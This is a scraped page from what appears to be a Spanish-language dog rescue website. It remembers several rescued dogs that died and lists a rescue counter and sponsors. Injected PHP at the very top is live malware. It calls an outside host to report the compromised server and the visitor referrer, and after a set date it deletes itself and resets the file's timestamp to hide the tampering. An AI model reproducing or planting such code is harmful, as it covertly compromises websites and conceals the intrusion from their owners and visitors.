check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732081){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Recordamos a

UniversoPyme

universopyme

Inscripción a boletín electrónico











Recordamos a PDF Imprimir E-mail

TIKA!!

Nuestra inolvidable Tika, siempre te recordaremos con mucho amor!

tika

 

Pilly!!

Te adoramos Pilly y nunca te olvidaremos

 

pilly_1

 

 

 

Golum. Un cachorrito con mucho miedo, pasamos 1 semana tratando de rescatarlo de su vida en las calles. Hasta que una de nuestras voluntarias logró ubicarlo y nos ayudó a su rescate. Lo llevamos con el veterinario y ya no se pudo hacer nada por él. Tenia la pancita llena de agua, esto le oprimía los pulmoncitos. Lo bueno de esta situación es que su final no fue terrible, fue tranquilo y apacible.

 

Lupita. Ya teníamos mucho tiempo viéndola en la calle y con muchos perros detrás de ella, decidimos agarrarla para esterilizarla. Era tierna y dulce, una perrita ejemplar. Desgraciadamente tenía un tumor y se tuvo que sacrificar, pero sus últimas semanas las paso feliz, bajo techo, con comida y con mucho amor.

 

Dolly. Cuando llegó a nuestro refugio estaba embarazada y no lo sabíamos. Se fue adoptada por una familia que la quería mucho, y a los dos meses nos informaron que tuvo ¡9 perritos! Desafortunadamente murió envenenada. La recordamos con mucho cariño.

 

 

Contador de Casos de Éxito

Contador_arriba
perrosarescatados
contador_izq0_cero6_seis7_siete0_cerocontador_izq

 

Patrocinadores

petmedical

Logo_delaCalle_a_la_Casa_

royal_canin

Logo_Croquetero

bus